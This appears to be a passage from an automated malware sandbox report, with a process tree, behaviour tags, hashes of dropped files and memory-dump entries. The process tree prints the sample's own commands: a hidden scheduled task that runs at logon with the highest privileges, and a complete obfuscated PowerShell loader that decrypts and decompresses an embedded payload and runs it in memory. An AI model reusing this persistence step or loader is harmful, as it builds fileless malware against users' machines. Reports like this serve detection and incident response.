                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_569_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_569.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2280
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_569.vbs"
                                                                    3⤵
                                                                    • Checks computer location settings
                                                                    PID:3560
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_569.bat" "
                                                                      4⤵
                                                                        PID:1872
                                                                        • C:\Windows\system32\net.exe
                                                                          net file
                                                                          5⤵
                                                                            PID:5992
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 file
                                                                              6⤵
                                                                                PID:6060
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_569.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_569.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                              5⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1604
                                                                    • C:\ProgramData\$77wsappx.exe
                                                                      C:\ProgramData\$77wsappx.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4056

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\ProgramData\$77wsappx.exe
                                                                      Filesize

                                                                      442KB

                                                                      MD5

                                                                      04029e121a0cfa5991749937dd22a1d9

                                                                      SHA1

                                                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                      SHA256

                                                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                      SHA512

                                                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      661739d384d9dfd807a089721202900b

                                                                      SHA1

                                                                      5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                      SHA256

                                                                      70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                      SHA512

                                                                      81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                      Filesize

                                                                      152B

                                                                      MD5

                                                                      ab8ce148cb7d44f709fb1c460d03e1b0

                                                                      SHA1

                                                                      44d15744015155f3e74580c93317e12d2cc0f859

                                                                      SHA256

                                                                      014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff

                                                                      SHA512

                                                                      f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                      Filesize

                                                                      152B

                                                                      MD5

                                                                      38f59a47b777f2fc52088e96ffb2baaf

                                                                      SHA1

                                                                      267224482588b41a96d813f6d9e9d924867062db

                                                                      SHA256

                                                                      13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b

                                                                      SHA512

                                                                      4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                      Filesize

                                                                      265B

                                                                      MD5

                                                                      f5cd008cf465804d0e6f39a8d81f9a2d

                                                                      SHA1

                                                                      6b2907356472ed4a719e5675cc08969f30adc855

                                                                      SHA256

                                                                      fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

                                                                      SHA512

                                                                      dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                      Filesize

                                                                      5KB

                                                                      MD5

                                                                      e87856a763d8b164045b3e37fbf01a7c

                                                                      SHA1

                                                                      4dbce29903a24715fc368a4ada54bc058b0917d8

                                                                      SHA256

                                                                      0f4960d06ecbfce64d57e39b49c89941c42ce8c1f85ddb37af0438c377836d43

                                                                      SHA512

                                                                      03ad7b761cce6731404980184402f9c2eb6e3f9fa87105a4247f13661b8b1ee0d0eac8bd2f6547dc1a51a02330cc89d7eb09eddef8b19f4f045f69abc24ab09c

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      3d088c9c5477e8db56f889a4bbfd4f12

                                                                      SHA1

                                                                      52d28721b7752a8f3fe049bf2c396c1db8e3630e

                                                                      SHA256

                                                                      296be2800b2ae9d4e6682e2e93f61dddb082eaf6891daf584e8e6006eef19060

                                                                      SHA512

                                                                      02143e164a1f1db4402c5ace389ec3e05162670a6cde6cbc879ee7f7aeb3cbbce56cc983b51ecd29e3f7ec983b788617a615b677a56bb8ca36c7729a79066194

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                      Filesize

                                                                      16B

                                                                      MD5

                                                                      6752a1d65b201c13b62ea44016eb221f

                                                                      SHA1

                                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                      SHA256

                                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                      SHA512

                                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      693c4f295c12323475ed29ec0cd743a9

                                                                      SHA1

                                                                      0c559e8449dd82aa124243aaeedbafb1afb57aab

                                                                      SHA256

                                                                      7394eb14bf0b146fcd1a115da58b58936ff699782c2c856629da3e18b5d5a211

                                                                      SHA512

                                                                      155a7df886d27b02b0459f59ebd21b5b1668cf54cd25febd152b95de6d8c0aba759441c87c0be7732e02f82638e669814669042e27176c0989061303a633d8a1

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      ce1b4ff51a6c7aab5ab830527aa31cc9

                                                                      SHA1

                                                                      8eb060ad95d2b461d5e09f7ac584b79a11d42930

                                                                      SHA256

                                                                      6dcc7d251bea4aedbb21e4993f62e64dc56cf5365b6821fcb927a99b8adb2980

                                                                      SHA512

                                                                      bc18bb934ed928b441076094334a5842db7000ad3157d3d6dd4ce81c8255396ae316cf977a488748efc777d069032a01ae4f4dde50e8cb00e769576d0ed1ad6f

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      f8d49a4af7a844bfc7247d5670def557

                                                                      SHA1

                                                                      26ae0ce194a77a7a1887cf93741293fdfa6c94c4

                                                                      SHA256

                                                                      61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

                                                                      SHA512

                                                                      9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      6d42b6da621e8df5674e26b799c8e2aa

                                                                      SHA1

                                                                      ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                      SHA256

                                                                      5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                      SHA512

                                                                      53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      fd98baf5a9c30d41317663898985593b

                                                                      SHA1

                                                                      ea300b99f723d2429d75a6c40e0838bf60f17aad

                                                                      SHA256

                                                                      9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

                                                                      SHA512

                                                                      bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      400B

                                                                      MD5

                                                                      a5c92ec315873e94fc45b5ddafb95111

                                                                      SHA1

                                                                      34a36943b00ec6c76272095cc0cf439fd88904cc

                                                                      SHA256

                                                                      1d227fe21e973f14f0ea799b67323e5378d2f581bdadd78aad75679c61a9a33b

                                                                      SHA512

                                                                      633e8ff80c229fc703ba04146024c617400e4a6fa691c9b343c0e48d14b2a41b9909d968c0cdfff0ffba0a580e0843adf81088683b4af7e93e4b1f190057487c

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      d91eebce9f88bfa3ebce8438b9e42432

                                                                      SHA1

                                                                      98c013985c37ed005476e323d1aff8baaf059623

                                                                      SHA256

                                                                      a82dcc043bc2a4bb5d11c1eaad32ab3266f5b857b50a9373e5c1547d76107672

                                                                      SHA512

                                                                      ace78d94357d0a145708076f2bbda25b9d69673fc0969a9b574b06a6ff65960e45a5a267a20da2d07cdc76ab78881ce7e62aa5a860a45c518ac8afd5372ca9f1

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      0358661cd66632bf34409a63f5628198

                                                                      SHA1

                                                                      3cd987ca56cc4e904c2bdf270b57987684ded9cf

                                                                      SHA256

                                                                      ef0f8fea919aca94aca77364951fae99e03bcb9142a420ed015ab7e504969698

                                                                      SHA512

                                                                      eeefe4a6c43887ef9d2943cb88c406964b58abed4c6222f91e7b4867c5f457ced5d1d8deb5500ef46d7573e62035ae1008386c73fcdf5ababedb0ced019c75a1

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iaeuulhs.yg0.ps1
                                                                      Filesize

                                                                      60B

                                                                      MD5

                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                      SHA1

                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                      SHA256

                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                      SHA512

                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Roaming\startup_str_569.vbs
                                                                      Filesize

                                                                      115B

                                                                      MD5

                                                                      097b1d8324abe27ef38de35f3ee9d912

                                                                      SHA1

                                                                      9ca3a69d01bc07a44b9ee2ae70bc73927486b8a8

                                                                      SHA256

                                                                      80ab9811340725b35b90bbf40470d6c27827c9d16a704fcbd5184bdb992762d3

                                                                      SHA512

                                                                      9b4e662f799ee26878c3b1c241809921953dd4d32d4a9ab2595f4762cb13921578772a6f25053e12e53833e9863e98c686fccfa36154a0cb708740aad22cd8e2

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Roaming\startup_str_690.vbs
                                                                      Filesize

                                                                      115B

                                                                      MD5

                                                                      b121b7c1e501abe8ae0ccd6276869e0c

                                                                      SHA1

                                                                      668ea48aaffc2edaca48bb23dd227499041fbc33

                                                                      SHA256

                                                                      de61c3ec819cd11b14650bd8c9b56f14f1b2e3d887519395ed78a594e7731e01

                                                                      SHA512

                                                                      1bd4e5fd8638f4a565d15dc95c0b4435deb827411eba5fa77613a98c6424c24165827707f200dddc119267746abe50691653db8752870d233980c98e97ed9a89

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Roaming\startup_str_695.vbs
                                                                      Filesize

                                                                      115B

                                                                      MD5

                                                                      316aa678e649c5ebe73c5f799f007afd

                                                                      SHA1

                                                                      207d29c16ac78205ce7390dfd46e7e6bb51bb89a

                                                                      SHA256

                                                                      1c363b1db22b57ba4fe1771dbbaa6e0a8b2391e59aa102664542d66f36332d8a

                                                                      SHA512

                                                                      e2004a291c0bc2292c47e92ccff9e5c60c7f9d01d06b8617b51534f36ce89a905de54a8ed4dd79c0577a7cf4d947f5efc34d84331a564e0c1edf2ab84e00a678

                                                                      Download Submit

                                                                    • C:\Users\Admin\Downloads\Unconfirmed 302473.crdownload
                                                                      Filesize

                                                                      267KB

                                                                      MD5

                                                                      b73ef489617145823323c8680c0cf926

                                                                      SHA1

                                                                      ae9f2c40ec173eab247553e1c63998a2bccf8040

                                                                      SHA256

                                                                      92d971fa9d2c006488924e5ec81bf79e9bac6c7028b2dfdd4a553b59e3ef3660

                                                                      SHA512

                                                                      0a6a558d2b164e6fa46dc70b0b4ff40358db1288dc6fa00609416aaca3dd48b94c8d76eac1505c7190aba8712dd77e3adbc31047a93046f61b69a023778bf44a

                                                                      Download Submit

                                                                    • memory/1248-155-0x0000017CFE080000-0x0000017CFE0B4000-memory.dmp

                                                                      Filesize

                                                                      208KB

                                                                      Download

                                                                    • memory/4056-310-0x000001D87E3F0000-0x000001D87E434000-memory.dmp

                                                                      Filesize

                                                                      272KB

                                                                      Download

                                                                    • memory/4056-311-0x000001D87E6E0000-0x000001D87E756000-memory.dmp

                                                                      Filesize

                                                                      472KB

                                                                      Download

                                                                    • memory/5056-80-0x000001711C1D0000-0x000001711C1D8000-memory.dmp

                                                                      Filesize

                                                                      32KB

                                                                      Download

                                                                    • memory/5056-81-0x000001711C590000-0x000001711C5C4000-memory.dmp

                                                                      Filesize

                                                                      208KB

                                                                      Download

                                                                    • memory/5056-75-0x000001711C360000-0x000001711C382000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                      Download

                                                                    • memory/5648-113-0x000001A2B2B50000-0x000001A2B2B60000-memory.dmp

                                                                      Filesize

                                                                      64KB

                                                                      Download